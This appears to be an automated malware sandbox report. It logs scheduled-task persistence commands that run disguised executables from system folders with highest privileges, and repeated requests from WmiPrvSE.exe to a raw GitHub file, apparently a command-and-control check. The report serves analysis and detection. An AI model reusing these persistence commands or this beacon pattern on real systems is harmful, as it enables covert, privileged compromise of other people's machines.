schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3128
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\RuntimeBroker.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1476
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\System.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4124
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\System.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1468
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Windows\Migration\WTR\System.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2932
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 5 /tr "'C:\Users\Default\DllCommonsvc.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2584
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Users\Default\DllCommonsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4452
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 6 /tr "'C:\Users\Default\DllCommonsvc.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3460
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1064
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3596
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1168
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5096
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:776
-
C:\Windows\system32\schtasks.exe (depth 1)
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Registry.exe'" /rl HIGHEST /f
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1268
Network
-
Remote address: 8.8.8.8:53 | Request: 104.219.191.52.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 8.8.8.8:53 | Request: 172.210.232.199.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 8.8.8.8:53 | Request: 22.160.190.20.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 8.8.8.8:53 | Request: 95.221.229.192.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 8.8.8.8:53 | Request: 228.249.119.40.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 8.8.8.8:53
Request: raw.githubusercontent.com IN A
Response:
raw.githubusercontent.com IN A 185.199.110.133
raw.githubusercontent.com IN A 185.199.111.133
raw.githubusercontent.com IN A 185.199.108.133
raw.githubusercontent.com IN A 185.199.109.133
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:01 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600020-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841741.206968,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a15c5b71e4d756129bff8f22ca44d0252ae9e134
Expires: Sun, 22 Dec 2024 04:34:01 GMT
Source-Age: 228
-
Remote address: 8.8.8.8:53
Request: 133.110.199.185.in-addr.arpa IN PTR
Response: 133.110.199.185.in-addr.arpa IN PTR cdn-185-199-110-133.github.com
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:14 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4258-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841754.355583,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 9687e36e665bead5408d5ff57cde745dfb9700ac
Expires: Sun, 22 Dec 2024 04:34:14 GMT
Source-Age: 161
-
Remote address: 8.8.8.8:53 | Request: 50.23.12.20.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 8.8.8.8:53 | Request: 206.23.85.13.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 8.8.8.8:53
Request: 65.139.73.23.in-addr.arpa IN PTR
Response: 65.139.73.23.in-addr.arpa IN PTR a23-73-139-65.deploy.static.akamaitechnologies.com
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:29 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600039-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841770.662053,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 6a706c119f1307aeaa872a3e587e373529c487cd
Expires: Sun, 22 Dec 2024 04:34:29 GMT
Source-Age: 256
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:41 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600083-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841781.471472,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 953e7901b703ededd798c05b19c8e6df543f00cd
Expires: Sun, 22 Dec 2024 04:34:41 GMT
Source-Age: 268
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:29:55 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420112-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841795.165508,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 89320ee43a42c83a45c1b35555764241b58f3e4e
Expires: Sun, 22 Dec 2024 04:34:55 GMT
Source-Age: 202
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600036-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841808.412225,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 496a335da1f09cb9391eb4e8cdf3ae4c86baedf2
Expires: Sun, 22 Dec 2024 04:35:08 GMT
Source-Age: 295
-
Remote address: 8.8.8.8:53 | Request: 48.229.111.52.in-addr.arpa IN PTR | Response: (empty)
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:20 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600094-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841821.833181,VS0,VE3
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 5225e74bce1ee9127072b92d4cefd5bd6d061e17
Expires: Sun, 22 Dec 2024 04:35:20 GMT
Source-Age: 4
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:28 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600058-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841829.600212,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a91384b30d45fa1945f4c1872cec39ea1530cafe
Expires: Sun, 22 Dec 2024 04:35:28 GMT
Source-Age: 12
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:42 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600039-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841843.903808,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: e69e6572d3f9527b0ea53993e77c0f5fff3567f1
Expires: Sun, 22 Dec 2024 04:35:42 GMT
Source-Age: 26
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:30:56 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600023-LCY
X-Cache: HIT
X-Cache-Hits: 3
X-Timer: S1734841856.121539,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: f1d1c2d8e2fed86d87a1d98360e117ec56ebfc3a
Expires: Sun, 22 Dec 2024 04:35:56 GMT
Source-Age: 39
-
Remote address: 185.199.110.133:443
Request:
GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: raw.githubusercontent.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 04:31:03 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600044-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734841864.881667,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 35acf4955571c22ec29ba72af8ff951d8f3068cd
Expires: Sun, 22 Dec 2024 04:36:03 GMT
Source-Age: 47
-
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 914 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 896 B | 5.1kB | 8 | 10
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 897 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 914 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 861 B | 5.1kB | 8 | 10
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 896 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 914 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 897 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 896 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 861 B | 5.1kB | 8 | 10
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
185.199.110.133:443 | https://raw.githubusercontent.com/justbio123/raven/main/api.txt | tls, http | WmiPrvSE.exe | 861 B | 5.1kB | 8 | 9
HTTP Request: GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt
HTTP Response: 200
-
73 B | 147 B | 1 | 1
DNS Request: 104.219.191.52.in-addr.arpa
-
74 B | 128 B | 1 | 1
DNS Request: 172.210.232.199.in-addr.arpa
-
73 B | 144 B | 1 | 1
DNS Request: 95.221.229.192.in-addr.arpa
-
72 B | 158 B | 1 | 1
DNS Request: 22.160.190.20.in-addr.arpa
-
73 B | 159 B | 1 | 1
DNS Request: 228.249.119.40.in-addr.arpa
-
71 B | 135 B | 1 | 1
DNS Request: raw.githubusercontent.com
DNS Response: 185.199.110.133, 185.199.111.133, 185.199.108.133, 185.199.109.133
-
74 B | 118 B | 1 | 1
DNS Request: 133.110.199.185.in-addr.arpa
-
70 B | 156 B | 1 | 1
DNS Request: 50.23.12.20.in-addr.arpa
-
71 B | 145 B | 1 | 1
DNS Request: 206.23.85.13.in-addr.arpa
-
71 B | 135 B | 1 | 1
DNS Request: 65.139.73.23.in-addr.arpa
-
72 B | 158 B | 1 | 1
DNS Request: 48.229.111.52.in-addr.arpa
-
MITRE ATT&CK Enterprise v15
Downloads